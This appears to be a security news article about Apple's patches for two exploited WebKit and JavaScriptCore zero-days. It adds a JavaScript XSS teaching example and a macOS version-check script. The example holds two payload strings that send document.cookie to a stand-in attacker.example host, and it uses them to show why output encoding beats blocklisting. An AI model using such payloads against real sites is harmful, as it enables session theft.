Apple has shipped a series of software updates across its product lines to close two newly disclosed zero-days, both of which the company says may already have been exploited in the wild.
The fixes for CVE-2024-44308 and CVE-2024-44309 – both credited to Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group – ship in iOS and iPadOS 18.1.1 and 17.7.2, macOS Sequoia 15.1.1 and visionOS 2.1.1, and also in the separate Safari 18.1.1 update. Devices on earlier versions remain vulnerable until they move to these releases.
CVE-2024-44308 affects JavaScriptCore, the JavaScript engine inside WebKit, and allows arbitrary code execution if the target device can be made to process maliciously crafted web content. Apple says it is aware of a report that the flaw may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 affects the open source WebKit browser engine used extensively within the Apple ecosystem, and is described as a cookie management issue that enabled a threat actor to conduct a cross-site scripting (XSS) attack.
In an XSS attack, the threat actor gets script of their choosing into a page served by an otherwise trusted website, so that it runs in the victim's browser with that site's privileges. XSS can serve a number of ends, including stealing session cookies so the attacker can masquerade as the victim, and it is also used to spread malware and harvest credentials.
Again, there are reports of in-the-wild exploitation of CVE-2024-44309 against Intel-based Macs.
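To make the XSS mechanism concrete, here is an added example written for this article. It is not Apple or WebKit code and it is not the technique used against CVE-2024-44309, whose internals Apple has not described: a page that echoes a query parameter into its HTML, rendered three ways (unescaped, with a naive "strip script tags" blocklist, and with output encoding), plus a rough check of whether attacker input ended up as markup. The function names, the attacker.example host and the two payload strings are all constructed for the example.

```javascript
// Added example for this article, not Apple or WebKit code, and not the payload
// used against CVE-2024-44309 (which Apple has not described). Function names,
// the attacker.example host and the payloads are constructed for illustration.

// Output-encode a string for insertion into HTML text content: every character
// that can start markup becomes an entity, so the browser renders it as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: a query parameter is concatenated straight into the page. Whatever
// the attacker put in the link becomes part of the page's markup.
function renderGreetingVulnerable(name) {
  return `<h1>Hello, ${name}</h1>`;
}

// Still vulnerable: stripping "<script>" stops the obvious payload but not an
// element with an event-handler attribute, which runs script just the same.
function renderGreetingBlocklist(name) {
  const stripped = String(name).replace(/<\/?script[^>]*>/gi, '');
  return `<h1>Hello, ${stripped}</h1>`;
}

// Hardened: encode at the point of output. The input is kept as-is; it simply
// can never be interpreted as markup.
function renderGreetingHardened(name) {
  return `<h1>Hello, ${escapeHtml(name)}</h1>`;
}

// Rough detector used to show the difference: does the rendered HTML contain
// any element the template itself did not emit? (A real check would parse the
// DOM; this regex is enough for these payloads.)
function containsInjectedTag(html, templateTags = ['h1']) {
  const names = [...html.matchAll(/<\s*\/?\s*([a-zA-Z][\w-]*)/g)]
    .map((m) => m[1].toLowerCase());
  return names.some((t) => !templateTags.includes(t));
}

// Constructed attacker inputs: both try to send the victim's cookies to a host
// the attacker controls, the session-theft outcome described in the article.
const PAYLOAD_SCRIPT =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const PAYLOAD_ONERROR =
  "<img src=x onerror=\"fetch('https://attacker.example/?c=' + document.cookie)\">";

// Summarise how each renderer handles each payload. Returns an object so the
// result can be inspected rather than only printed.
function compareRenderers() {
  return {
    vulnerableScript: containsInjectedTag(renderGreetingVulnerable(PAYLOAD_SCRIPT)),
    blocklistScript: containsInjectedTag(renderGreetingBlocklist(PAYLOAD_SCRIPT)),
    blocklistOnerror: containsInjectedTag(renderGreetingBlocklist(PAYLOAD_ONERROR)),
    hardenedScript: containsInjectedTag(renderGreetingHardened(PAYLOAD_SCRIPT)),
    hardenedOnerror: containsInjectedTag(renderGreetingHardened(PAYLOAD_ONERROR)),
  };
}

console.log(compareRenderers());
```

The blocklist renderer passes the first payload and fails the second, which is why output encoding at the sink, not input filtering, is the standard fix. Two further points a practitioner would add: the encoding must match the context (an attribute value, a URL or an inline script each need different treatment), and marking the session cookie HttpOnly keeps it out of reach of document.cookie even when a script does run.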
WebKit at risk
Michael Covington, vice-president of strategy at Jamf, a device management company specialising in Apple products, said that it is very important for defenders to promptly address vulnerabilities in WebKit, given the framework’s criticality to the Safari web browser.
“The fixes provided by Apple introduce stronger checks to detect and prevent malicious activity, as well as improve how devices manage and track data during web browsing. With attackers potentially exploiting both vulnerabilities, it is critical that users and mobile-first organisations apply the latest patches as soon as they are able,” said Covington.
CVE-2024-44309 is not the first WebKit issue identified this year. In late January Apple patched CVE-2024-23222, which also made it into the US Cybersecurity and Infrastructure Security Agency's (CISA's) Known Exploited Vulnerabilities (KEV) catalogue.
Also exploited as a zero-day, CVE-2024-23222 was a type confusion flaw leading to arbitrary code execution on the vulnerable device.
As ever, Apple has provided scant detail on either of the new vulnerabilities or how they have been used. However, their discovery by Google teams that have previously tracked vulnerabilities exploited by commercial spyware vendors – such as the disgraced Israeli firm NSO – gives a hint as to who is likely to be interested in flaws of this kind.
Apple remains alert to such issues, and notably issued a security alert to iOS users in over 90 countries back in April, after detecting that they were being targeted by a mercenary spyware attack that was remotely compromising their devices.
As usual, Apple users who have not enabled automatic updates can download the patches by navigating to their device's Settings menu, then to General, then to Software Update.
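For anyone checking a fleet of Macs rather than a single device, the following is an added example written for this article, not an Apple tool. It compares the installed macOS version, and the Safari bundle version where it is readable, against the fixed builds the article names (macOS Sequoia 15.1.1 and Safari 18.1.1) and, on a Mac that is behind, lists pending updates with Apple's softwareupdate utility. The version_ge, macos_patched and safari_patched names and the Safari Info.plist path are assumptions for illustration; the sw_vers, softwareupdate and defaults commands are Apple's and only exist on macOS, so the live check is skipped elsewhere.

```shell
#!/bin/sh
# Added example for this article, not an Apple tool. Compares the running macOS
# version (and Safari bundle version, if readable) against the builds the
# article names as carrying the CVE-2024-44308/44309 fixes. Function names and
# the Safari Info.plist path are assumptions for illustration.

MIN_MACOS="15.1.1"    # macOS Sequoia 15.1.1
MIN_SAFARI="18.1.1"   # Safari 18.1.1

# version_ge A B: exit 0 if dotted version A >= B, comparing component by
# component numerically; missing trailing components count as 0.
version_ge() {
  _a="$1"; _b="$2"; _i=1
  while :; do
    _ca=$(printf '%s' "$_a" | cut -d. -f"$_i")
    _cb=$(printf '%s' "$_b" | cut -d. -f"$_i")
    [ -z "$_ca" ] && [ -z "$_cb" ] && return 0
    _ca=${_ca:-0}; _cb=${_cb:-0}
    [ "$_ca" -gt "$_cb" ] && return 0
    [ "$_ca" -lt "$_cb" ] && return 1
    _i=$((_i + 1))
  done
}

# macos_patched VERSION: exit 0 if the given macOS productVersion is at or
# above the Sequoia build that carries the fixes.
macos_patched() { version_ge "$1" "$MIN_MACOS"; }

# safari_patched VERSION: exit 0 if the given Safari version carries the fixes.
safari_patched() { version_ge "$1" "$MIN_SAFARI"; }

# Live check, only meaningful on a Mac: sw_vers, softwareupdate and defaults
# are macOS tools, so this block is skipped on other systems.
if [ "$(uname -s)" = "Darwin" ]; then
  macos_ver=$(sw_vers -productVersion)
  if macos_patched "$macos_ver"; then
    echo "macOS $macos_ver: at or above $MIN_MACOS"
  else
    echo "macOS $macos_ver: below $MIN_MACOS, pending updates:"
    softwareupdate --list
  fi
  plist=/Applications/Safari.app/Contents/Info.plist
  if [ -r "$plist" ]; then
    safari_ver=$(defaults read "$plist" CFBundleShortVersionString)
    if safari_patched "$safari_ver"; then
      echo "Safari $safari_ver: at or above $MIN_SAFARI"
    else
      echo "Safari $safari_ver: below $MIN_SAFARI"
    fi
  fi
fi
```

Read the two results together: a Mac that is not on the Sequoia line will always report "below 15.1.1", and for such machines the Safari 18.1.1 update is the one that carries the WebKit-side fix, so the Safari line is the one that matters there. iPhones and iPads have their own fixed versions (18.1.1 and 17.7.2) and are outside this script.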